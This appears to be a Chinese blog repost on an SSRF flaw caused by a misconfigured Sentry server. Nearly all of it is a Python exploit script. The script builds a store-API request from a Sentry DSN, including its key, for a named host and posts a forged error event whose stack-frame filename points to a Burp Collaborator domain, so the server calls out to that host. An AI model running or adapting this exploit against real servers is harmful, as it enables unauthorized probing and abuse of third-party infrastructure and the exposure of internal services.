zoukankan      html  css  js  c++  java

  • sentry配置不当导致ssrf漏洞

    脚本如下

    import requests
    import re

    if __name__ == "__main__":
        s = "https://a8d729459beb446eb3cbb9df997dcc7b@sentry.mindworks.xyz/1"
        collaborator = "dp6sk5k006h6dcq3bdu6e6a9t0zqnf.burpcollaborator.net"
        key = re.search('https://(.*)@', s)
        domain = re.search('@(.*)/', s)
        number = re.search('/(.*)', s[8:])
        url = "https://" + domain.group(1) + "/api/" + number.group(1) + "/store/?sentry_key=" + key.group(1) + "&sentry_version=7"
        print(url)
        datas = {"extra":{"component":"redux/actions/index","action":"RegisterDeviceWeb","serialized":{"code":"INVALID_CREDENTIALS","details":[]}},"fingerprint":["3cbf661c7f723b0a5816c16968fd9493","Non-Error exception captured with keys: code, details, message"],"message":"Non-Error exception captured with keys: code, details, message","stacktrace":{"frames":[{"colno":218121,"filename":"http://"+collaborator,"function":"?","lineno":1}]},"exception":{"values":[{"value":"Custom Object","type":"Error"}]},"event_id":"d0513ec5a3544e05aef0d1c7c5b24bae","platform":"javascript","sdk":{"name":"sentry.javascript.browser","packages":[{"name":"npm:@sentry/browser","version":"4.6.4"}],"version":"4.6.4"},"release":"6225dd99","user":{"phash":"996a3f4661e02cb505ae0daf406555e9b914f9d43d635c52cfc7485046862a7f"},"breadcrumbs":[{"timestamp":1554226659.455,"category":"navigation","data":{"from":"/","to":"/login"}}]}
        headers = {'Content-type': 'application/json', 'Origin':'https://z.tochka.com/'}
        rsp = requests.post(url, json=datas, headers=headers)
  • 相关阅读:
    入职一家新公司
    简单的线性数据比较
    python编程导论读书笔记【4】终章
    Hadoop构建数据仓库实践读书笔记【3】__数据仓库设计基础
    清北最后冲刺 张浩威 吃鱼
    新汉诺塔
    小朋友的数字
    硬币购物
    HH的项链
    求逆序对 && 逆序对数列
  • 原文地址:https://www.cnblogs.com/jinqi520/p/12846667.html
Copyright © 2011-2022 走看看